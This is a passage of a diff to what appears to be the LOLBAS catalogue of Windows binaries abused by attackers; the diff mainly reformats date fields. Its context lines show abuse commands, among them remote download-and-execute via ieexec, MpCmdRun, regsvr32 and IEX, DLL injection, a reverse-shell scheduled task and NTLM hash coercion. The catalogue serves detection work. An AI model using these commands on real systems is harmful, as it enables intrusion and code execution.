 Name: Gpscript.exe
 Description: Used by group policy to process scripts
 Author: 'Oddvar Moe'
-Created: '2018-05-25'
+Created: 2018-05-25
 Commands:
  - Command: Gpscript /logon
    Description: Executes logon scripts configured in Group Policy.
--- a/yml/OSBinaries/Hh.yml
+++ b/yml/OSBinaries/Hh.yml
@ -2,7 +2,7 @@
 Name: Hh.exe
 Description: Binary used for processing chm files in Windows
 Author: 'Oddvar Moe'
-Created: '2018-05-25'
+Created: 2018-05-25
 Commands:
  - Command: HH.exe http://some.url/script.ps1
    Description: Open the target PowerShell script with HTML Help.
--- a/yml/OSBinaries/Ie4uinit.yml
+++ b/yml/OSBinaries/Ie4uinit.yml
@ -2,7 +2,7 @@
 Name: Ie4uinit.exe
 Description:
 Author: 'Oddvar Moe'
-Created: '2018-05-25'
+Created: 2018-05-25
 Commands:
  - Command: ie4uinit.exe -BaseSettings
    Description: Executes commands from a specially prepared ie4uinit.inf file.
--- a/yml/OSBinaries/Ieexec.yml
+++ b/yml/OSBinaries/Ieexec.yml
@ -2,7 +2,7 @@
 Name: Ieexec.exe
 Description: The IEExec.exe application is an undocumented Microsoft .NET Framework application that is included with the .NET Framework. You can use the IEExec.exe application as a host to run other managed applications that you start by using a URL.
 Author: 'Oddvar Moe'
-Created: '2018-05-25'
+Created: 2018-05-25
 Commands:
  - Command: ieexec.exe http://x.x.x.x:8080/bypass.exe
    Description: Downloads and executes bypass.exe from the remote server.
--- a/yml/OSBinaries/Ilasm.yml
+++ b/yml/OSBinaries/Ilasm.yml
@ -2,7 +2,7 @@
 Name: Ilasm.exe
 Description: used for compile c# code into dll or exe.
 Author: Hai vaknin (lux)
-Created: 17/03/2020
+Created: 2020-03-17
 Commands:
  - Command: ilasm.exe C:\public\test.txt /exe
    Description: Binary file used by .NET to compile c# code to .exe
--- a/yml/OSBinaries/Infdefaultinstall.yml
+++ b/yml/OSBinaries/Infdefaultinstall.yml
@ -2,7 +2,7 @@
 Name: Infdefaultinstall.exe
 Description: Binary used to perform installation based on content inside inf files
 Author: 'Oddvar Moe'
-Created: '2018-05-25'
+Created: 2018-05-25
 Commands:
  - Command: InfDefaultInstall.exe Infdefaultinstall.inf
    Description: Executes SCT script using scrobj.dll from a command in entered into a specially prepared INF file.
--- a/yml/OSBinaries/Installutil.yml
+++ b/yml/OSBinaries/Installutil.yml
@ -2,7 +2,7 @@
 Name: Installutil.exe
 Description: The Installer tool is a command-line utility that allows you to install and uninstall server resources by executing the installer components in specified assemblies
 Author: 'Oddvar Moe'
-Created: '2018-05-25'
+Created: 2018-05-25
 Commands:
  - Command: InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll
    Description: Execute the target .NET DLL or EXE.
--- a/yml/OSBinaries/Jsc.yml
+++ b/yml/OSBinaries/Jsc.yml
@ -2,7 +2,7 @@
 Name: Jsc.exe
 Description: Binary file used by .NET to compile javascript code to .exe or .dll format
 Author: 'Oddvar Moe'
-Created: '2019-05-31'
+Created: 2019-05-31
 Commands:
  - Command: jsc.exe scriptfile.js
    Description: Use jsc.exe to compile javascript code stored in scriptfile.js and output scriptfile.exe.
--- a/yml/OSBinaries/Makecab.yml
+++ b/yml/OSBinaries/Makecab.yml
@ -2,7 +2,7 @@
 Name: Makecab.exe
 Description: Binary to package existing files into a cabinet (.cab) file
 Author: 'Oddvar Moe'
-Created: '2018-05-25'
+Created: 2018-05-25
 Commands:
  - Command: makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab
    Description: Compresses the target file into a CAB file stored in the Alternate Data Stream (ADS) of the target file.
--- a/yml/OSBinaries/Mavinject.yml
+++ b/yml/OSBinaries/Mavinject.yml
@ -2,7 +2,7 @@
 Name: Mavinject.exe
 Description: Used by App-v in Windows
 Author: 'Oddvar Moe'
-Created: '2018-05-25'
+Created: 2018-05-25
 Commands:
  - Command: MavInject.exe 3110 /INJECTRUNNING c:\folder\evil.dll
    Description: Inject evil.dll into a process with PID 3110.
--- a/yml/OSBinaries/Microsoft.Workflow.Compiler.yml
+++ b/yml/OSBinaries/Microsoft.Workflow.Compiler.yml
@ -2,7 +2,7 @@
 Name: Microsoft.Workflow.Compiler.exe
 Description: A utility included with .NET that is capable of compiling and executing C# or VB.net code.
 Author: 'Conor Richard'
-Created: '2018-10-22'
+Created: 2018-10-22
 Commands:
  - Command: Microsoft.Workflow.Compiler.exe tests.xml results.xml
    Description: Compile and execute C# or VB.net code in a XOML file referenced in the test.xml file.
--- a/yml/OSBinaries/Mmc.yml
+++ b/yml/OSBinaries/Mmc.yml
@ -2,7 +2,7 @@
 Name: Mmc.exe
 Description: Load snap-ins to locally and remotely manage Windows systems
 Author: '@bohops'
-Created: '2018-12-04'
+Created: 2018-12-04
 Commands:
  - Command: mmc.exe -Embedding c:\path\to\test.msc
    Description: Launch a 'backgrounded' MMC process and invoke a COM payload
--- a/yml/OSBinaries/MpCmdRun.yml
+++ b/yml/OSBinaries/MpCmdRun.yml
@ -2,7 +2,7 @@
 Name: MpCmdRun.exe
 Description: Binary part of Windows Defender. Used to manage settings in Windows Defender
 Author: 'Oddvar Moe'
-Created: '09/03/2020'
+Created: 2020-03-20
 Commands:
  - Command: MpCmdRun.exe -DownloadFile -url https://attacker.server/beacon.exe -path c:\\temp\\beacon.exe
    Description: Download file to specified path - Slashes work as well as dashes (/DownloadFile, /url, /path)
--- a/yml/OSBinaries/Msbuild.yml
+++ b/yml/OSBinaries/Msbuild.yml
@ -2,7 +2,7 @@
 Name: Msbuild.exe
 Description: Used to compile and execute code
 Author: 'Oddvar Moe'
-Created: '2018-05-25'
+Created: 2018-05-25
 Commands:
  - Command: msbuild.exe pshell.xml
    Description: Build and execute a C# project stored in the target XML file.
@ -37,7 +37,7 @@ Full_Path:
  - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Msbuild.exe
  - Path: C:\Program Files (x86)\MSBuild\14.0\bin\MSBuild.exe
 Code_Sample: 
- Code:
+  - Code:
 Detection:
 - IOC: Msbuild.exe should not normally be executed on workstations
 Resources:
--- a/yml/OSBinaries/Msconfig.yml
+++ b/yml/OSBinaries/Msconfig.yml
@ -2,7 +2,7 @@
 Name: Msconfig.exe
 Description: MSConfig is a troubleshooting tool which is used to temporarily disable or re-enable software, device drivers or Windows services that run during startup process to help the user determine the cause of a problem with Windows
 Author: 'Oddvar Moe'
-Created: '2018-05-25'
+Created: 2018-05-25
 Commands:
  - Command: Msconfig.exe -5
    Description: Executes command embeded in crafted c:\windows\system32\mscfgtlc.xml.
--- a/yml/OSBinaries/Msdt.yml
+++ b/yml/OSBinaries/Msdt.yml
@ -2,7 +2,7 @@
 Name: Msdt.exe
 Description: Microsoft diagnostics tool
 Author: 'Oddvar Moe'
-Created: '2018-05-25'
+Created: 2018-05-25
 Commands:
  - Command: msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af C:\PCW8E57.xml /skip TRUE
    Description: Executes the Microsoft Diagnostics Tool and executes the malicious .MSI referenced in the PCW8E57.xml file.
--- a/yml/OSBinaries/Mshta.yml
+++ b/yml/OSBinaries/Mshta.yml
@ -2,7 +2,7 @@
 Name: Mshta.exe
 Description: Used by Windows to execute html applications. (.hta)
 Author: 'Oddvar Moe'
-Created: '2018-05-25'
+Created: 2018-05-25
 Commands:
  - Command: mshta.exe evilfile.hta
    Description: Opens the target .HTA and executes embedded JavaScript, JScript, or VBScript.
--- a/yml/OSBinaries/Msiexec.yml
+++ b/yml/OSBinaries/Msiexec.yml
@ -2,7 +2,7 @@
 Name: Msiexec.exe
 Description: Used by Windows to execute msi files
 Author: 'Oddvar Moe'
-Created: '2018-05-25'
+Created: 2018-05-25
 Commands:
  - Command: msiexec /quiet /i cmd.msi
    Description: Installs the target .MSI file silently.
--- a/yml/OSBinaries/Netsh.yml
+++ b/yml/OSBinaries/Netsh.yml
@ -2,7 +2,7 @@
 Name: Netsh.exe
 Description: Netsh is a Windows tool used to manipulate network interface settings.
 Author: 'Freddie Barr-Smith'
-Created: '2019-12-24'
+Created: 2019-12-24
 Commands:
  - Command: netsh.exe add helper C:\Users\User\file.dll
    Description: Use Netsh in order to execute a .dll file and also gain persistence, every time the netsh command is called
--- a/yml/OSBinaries/Odbcconf.yml
+++ b/yml/OSBinaries/Odbcconf.yml
@ -2,7 +2,7 @@
 Name: Odbcconf.exe
 Description: Used in Windows for managing ODBC connections
 Author: 'Oddvar Moe'
-Created: '2018-05-25'
+Created: 2018-05-25
 Commands:
  - Command: odbcconf -f file.rsp
    Description: Load DLL specified in target .RSP file. See the Playloads folder for an example .RSP file.
--- a/yml/OSBinaries/Pcalua.yml
+++ b/yml/OSBinaries/Pcalua.yml
@ -2,7 +2,7 @@
 Name: Pcalua.exe
 Description: Program Compatibility Assistant
 Author: 'Oddvar Moe'
-Created: '2018-05-25'
+Created: 2018-05-25
 Commands:
  - Command: pcalua.exe -a calc.exe
    Description: Open the target .EXE using the Program Compatibility Assistant.
--- a/yml/OSBinaries/Pcwrun.yml
+++ b/yml/OSBinaries/Pcwrun.yml
@ -2,7 +2,7 @@
 Name: Pcwrun.exe
 Description: Program Compatibility Wizard
 Author: 'Oddvar Moe'
-Created: '2018-05-25'
+Created: 2018-05-25
 Commands:
  - Command: Pcwrun.exe c:\temp\beacon.exe
    Description: Open the target .EXE file with the Program Compatibility Wizard.
--- a/yml/OSBinaries/Pktmon.yml
+++ b/yml/OSBinaries/Pktmon.yml
@ -2,7 +2,7 @@
 Name: Pktmon.exe
 Description: Capture Network Packets on the windows 10 with October 2018 Update or later.
 Author: 'Derek Johnson'
-Created: '2020-08-12'
+Created: 2020-08-12
 Commands:
  - Command: pktmon.exe start --etw
    Description: Will start a packet capture and store log file as PktMon.etl. Use pktmon.exe stop
--- a/yml/OSBinaries/Presentationhost.yml
+++ b/yml/OSBinaries/Presentationhost.yml
@ -2,7 +2,7 @@
 Name: Presentationhost.exe
 Description: File is used for executing Browser applications
 Author: 'Oddvar Moe'
-Created: '2018-05-25'
+Created: 2018-05-25
 Commands:
  - Command: Presentationhost.exe C:\temp\Evil.xbap
    Description: Executes the target XAML Browser Application (XBAP) file
--- a/yml/OSBinaries/Print.yml
+++ b/yml/OSBinaries/Print.yml
@ -2,7 +2,7 @@
 Name: Print.exe
 Description: Used by Windows to send files to the printer
 Author: 'Oddvar Moe'
-Created: '2018-05-25'
+Created: 2018-05-25
 Commands:
  - Command: print /D:C:\ADS\File.txt:file.exe C:\ADS\File.exe
    Description: Copy file.exe into the Alternate Data Stream (ADS) of file.txt.
--- a/yml/OSBinaries/Psr.yml
+++ b/yml/OSBinaries/Psr.yml
@ -2,7 +2,7 @@
 Name: Psr.exe
 Description: Windows Problem Steps Recorder, used to record screen and clicks.
 Author: Leon Rodenko
-Created: '2020-06-27'
+Created: 2020-06-27
 Commands:
  - Command: psr.exe /start /output D:\test.zip /sc 1 /gui 0
    Description: Record a user screen without creating a GUI. You should use "psr.exe /stop" to stop recording and create output file.
--- a/yml/OSBinaries/Rasautou.yml
+++ b/yml/OSBinaries/Rasautou.yml
@ -2,7 +2,7 @@
 Name: Rasautou.exe
 Description: Windows Remote Access Dialer
 Author: 'Tony Lambert'
-Created: '2020-01-10'
+Created: 2020-01-10
 Commands:
  - Command: rasautou -d powershell.dll -p powershell -a a -e e
    Description: Loads the target .DLL specified in -d and executes the export specified in -p. Options removed in Windows 10.
--- a/yml/OSBinaries/Reg.yml
+++ b/yml/OSBinaries/Reg.yml
@ -2,7 +2,7 @@
 Name: Reg.exe
 Description: Used to manipulate the registry
 Author: 'Oddvar Moe'
-Created: '2018-05-25'
+Created: 2018-05-25
 Commands:
  - Command: reg export HKLM\SOFTWARE\Microsoft\Evilreg c:\ads\file.txt:evilreg.reg
    Description: Export the target Registry key and save it to the specified .REG file within an Alternate data stream.
--- a/yml/OSBinaries/Regasm.yml
+++ b/yml/OSBinaries/Regasm.yml
@ -2,7 +2,7 @@
 Name: Regasm.exe
 Description: Part of .NET
 Author: 'Oddvar Moe'
-Created: '2018-05-25'
+Created: 2018-05-25
 Commands:
  - Command: regasm.exe AllTheThingsx64.dll
    Description: Loads the target .DLL file and executes the RegisterClass function.
--- a/yml/OSBinaries/Regedit.yml
+++ b/yml/OSBinaries/Regedit.yml
@ -2,7 +2,7 @@
 Name: Regedit.exe
 Description: Used by Windows to manipulate registry
 Author: 'Oddvar Moe'
-Created: '2018-05-25'
+Created: 2018-05-25
 Commands:
  - Command: regedit /E c:\ads\file.txt:regfile.reg HKEY_CURRENT_USER\MyCustomRegKey
    Description: Export the target Registry key to the specified .REG file.
--- a/yml/OSBinaries/Regini.yml
+++ b/yml/OSBinaries/Regini.yml
@ -2,7 +2,7 @@
 Name: Regini.exe
 Description: Used to manipulate the registry
 Author: 'Oddvar Moe'
-Created: '2020-07-03'
+Created: 2020-07-03
 Commands:
  - Command: regini.exe newfile.txt:hidden.ini
    Description: Write registry keys from data inside the Alternate data stream.
--- a/yml/OSBinaries/Register-cimprovider.yml
+++ b/yml/OSBinaries/Register-cimprovider.yml
@ -2,7 +2,7 @@
 Name: Register-cimprovider.exe
 Description: Used to register new wmi providers
 Author: 'Oddvar Moe'
-Created: '2018-05-25'
+Created: 2018-05-25
 Commands:
  - Command: Register-cimprovider -path "C:\folder\evil.dll"
    Description: Load the target .DLL.
--- a/yml/OSBinaries/Regsvcs.yml
+++ b/yml/OSBinaries/Regsvcs.yml
@ -2,7 +2,7 @@
 Name: Regsvcs.exe
 Description: Regsvcs and Regasm are Windows command-line utilities that are used to register .NET Component Object Model (COM) assemblies
 Author: 'Oddvar Moe'
-Created: '2018-05-25'
+Created: 2018-05-25
 Commands:
  - Command: regsvcs.exe AllTheThingsx64.dll
    Description: Loads the target .DLL file and executes the RegisterClass function.
--- a/yml/OSBinaries/Regsvr32.yml
+++ b/yml/OSBinaries/Regsvr32.yml
@ -2,7 +2,7 @@
 Name: Regsvr32.exe
 Description: Used by Windows to register dlls
 Author: 'Oddvar Moe'
-Created: '2018-05-25'
+Created: 2018-05-25
 Commands:
  - Command: regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll
    Description: Execute the specified remote .SCT script with scrobj.dll.
--- a/yml/OSBinaries/Replace.yml
+++ b/yml/OSBinaries/Replace.yml
@ -2,7 +2,7 @@
 Name: Replace.exe
 Description: Used to replace file with another file
 Author: 'Oddvar Moe'
-Created: '2018-05-25'
+Created: 2018-05-25
 Commands:
  - Command: replace.exe C:\Source\File.cab C:\Destination /A
    Description: Copy file.cab to destination
--- a/yml/OSBinaries/Rpcping.yml
+++ b/yml/OSBinaries/Rpcping.yml
@ -2,7 +2,7 @@
 Name: Rpcping.exe
 Description: Used to verify rpc connection
 Author: 'Oddvar Moe'
-Created: '2018-05-25'
+Created: 2018-05-25
 Commands:
  - Command: rpcping -s 127.0.0.1 -e 1234 -a privacy -u NTLM
    Description: Send a RPC test connection to the target server (-s) and force the NTLM hash to be sent in the process.
--- a/yml/OSBinaries/Rundll32.yml
+++ b/yml/OSBinaries/Rundll32.yml
@ -2,7 +2,7 @@
 Name: Rundll32.exe
 Description: Used by Windows to execute dll files
 Author: 'Oddvar Moe'
-Created: '2018-05-25'
+Created: 2018-05-25
 Commands:
  - Command: rundll32.exe AllTheThingsx64,EntryPoint
    Description: AllTheThingsx64 would be a .DLL file and EntryPoint would be the name of the entry point in the .DLL file to execute.
--- a/yml/OSBinaries/Runonce.yml
+++ b/yml/OSBinaries/Runonce.yml
@ -2,7 +2,7 @@
 Name: Runonce.exe
 Description:
 Author: 'Oddvar Moe'
-Created: '2018-05-25'
+Created: 2018-05-25
 Commands:
  - Command: Runonce.exe /AlternateShellStartup
    Description: Executes a Run Once Task that has been configured in the registry
--- a/yml/OSBinaries/Runscripthelper.yml
+++ b/yml/OSBinaries/Runscripthelper.yml
@ -2,7 +2,7 @@
 Name: Runscripthelper.exe
 Description:
 Author: 'Oddvar Moe'
-Created: '2018-05-25'
+Created: 2018-05-25
 Commands:
  - Command: runscripthelper.exe surfacecheck \\?\C:\Test\Microsoft\Diagnosis\scripts\test.txt C:\Test
    Description: Execute the PowerShell script named test.txt
--- a/yml/OSBinaries/Sc.yml
+++ b/yml/OSBinaries/Sc.yml
@ -2,7 +2,7 @@
 Name: Sc.exe
 Description: Used by Windows to manage services
 Author: 'Oddvar Moe'
-Created: '2018-05-25'
+Created: 2018-05-25
 Commands:
  - Command: sc create evilservice binPath="\"c:\\ADS\\file.txt:cmd.exe\" /c echo works > \"c:\ADS\works.txt\"" DisplayName= "evilservice" start= auto\ & sc start evilservice
    Description: Creates a new service and executes the file stored in the ADS.
--- a/yml/OSBinaries/Schtasks.yml
+++ b/yml/OSBinaries/Schtasks.yml
@ -2,7 +2,7 @@
 Name: Schtasks.exe
 Description: Schedule periodic tasks
 Author: 'Oddvar Moe'
-Created: '2018-05-25'
+Created: 2018-05-25
 Commands:
  - Command: schtasks /create /sc minute /mo 1 /tn "Reverse shell" /tr c:\some\directory\revshell.exe
    Description: Create a recurring task to execute every minute.
--- a/yml/OSBinaries/Scriptrunner.yml
+++ b/yml/OSBinaries/Scriptrunner.yml
@ -2,7 +2,7 @@
 Name: Scriptrunner.exe
 Description:
 Author: 'Oddvar Moe'
-Created: '2018-05-25'
+Created: 2018-05-25
 Commands:
  - Command: Scriptrunner.exe -appvscript calc.exe
    Description: Executes calc.exe
--- a/yml/OSBinaries/Syncappvpublishingserver.yml
+++ b/yml/OSBinaries/Syncappvpublishingserver.yml
@ -2,7 +2,7 @@
 Name: SyncAppvPublishingServer.exe
 Description: Used by App-v to get App-v server lists
 Author: 'Oddvar Moe'
-Created: '2018-05-25'
+Created: 2018-05-25
 Commands:
  - Command: SyncAppvPublishingServer.exe "n;(New-Object Net.WebClient).DownloadString('http://some.url/script.ps1') | IEX"
    Description: Example command on how inject Powershell code into the process
--- a/yml/OSBinaries/Ttdinject.yml
+++ b/yml/OSBinaries/Ttdinject.yml
@ -2,7 +2,7 @@
 Name: Ttdinject.exe
 Description: Used by Windows 1809 and newer to Debug Time Travel (Underlying call of tttracer.exe)
 Author: 'Maxime Nadeau'
-Created: '2020-05-12'
+Created: 2020-05-12
 Commands:
  - Command: TTDInject.exe /ClientParams "7 tmp.run 0 0 0 0 0 0 0 0 0 0" /Launch "C:/Windows/System32/calc.exe"
    Description: Execute calc using ttdinject.exe. Requires administrator privileges. A log file will be created in tmp.run. The log file can be changed, but the length (7) has to be updated.
--- a/yml/OSBinaries/Tttracer.yml
+++ b/yml/OSBinaries/Tttracer.yml
@ -2,7 +2,7 @@
 Name: Tttracer.exe
 Description: Used by Windows 1809 and newer to Debug Time Travel
 Author: 'Oddvar Moe'
-Created: '2019-11-5'
+Created: 2019-11-05
 Commands:
  - Command: tttracer.exe C:\windows\system32\calc.exe
    Description: Execute calc using tttracer.exe. Requires administrator privileges
--- a/yml/OSBinaries/Vbc.yml
+++ b/yml/OSBinaries/Vbc.yml
@ -2,7 +2,7 @@
 Name: vbc.exe
 Description: Binary file used for compile vbs code
 Author: Lior Adar
-Created: 27/02/2020
+Created: 2020-02-27
 Commands:
  - Command: vbc.exe /target:exe c:\temp\vbs\run.vb
    Description: Binary file used by .NET to compile vb code to .exe
--- a/yml/OSBinaries/Verclsid.yml
+++ b/yml/OSBinaries/Verclsid.yml
@ -2,7 +2,7 @@
 Name: Verclsid.exe
 Description:
 Author: '@bohops'
-Created: '2018-12-04'
+Created: 2018-12-04
 Commands:
  - Command: verclsid.exe /S /C {CLSID}
    Description: Used to verify a COM object before it is instantiated by Windows Explorer
--- a/yml/OSBinaries/Wab.yml
+++ b/yml/OSBinaries/Wab.yml
@ -2,7 +2,7 @@
 Name: Wab.exe
 Description: Windows address book manager
 Author: 'Oddvar Moe'
-Created: '2018-05-25'
+Created: 2018-05-25
 Commands:
  - Command: wab.exe
    Description: Change HKLM\Software\Microsoft\WAB\DLLPath and execute DLL of choice
--- a/yml/OSBinaries/Wmic.yml
+++ b/yml/OSBinaries/Wmic.yml
@ -2,7 +2,7 @@
 Name: Wmic.exe
 Description: The WMI command-line (WMIC) utility provides a command-line interface for WMI
 Author: 'Oddvar Moe'
-Created: '2018-05-25'
+Created: 2018-05-25
 Commands:
  - Command: wmic.exe process call create "c:\ads\file.txt:program.exe"
    Description: Execute a .EXE file stored as an Alternate Data Stream (ADS)
--- a/yml/OSBinaries/Wscript.yml
+++ b/yml/OSBinaries/Wscript.yml
@ -2,7 +2,7 @@
 Name: Wscript.exe
 Description: Used by Windows to execute scripts
 Author: 'Oddvar Moe'
-Created: '2018-05-25'
+Created: 2018-05-25
 Commands:
  - Command: wscript c:\ads\file.txt:script.vbs
    Description: Execute script stored in an alternate data stream
--- a/Show More
+++ b/Show More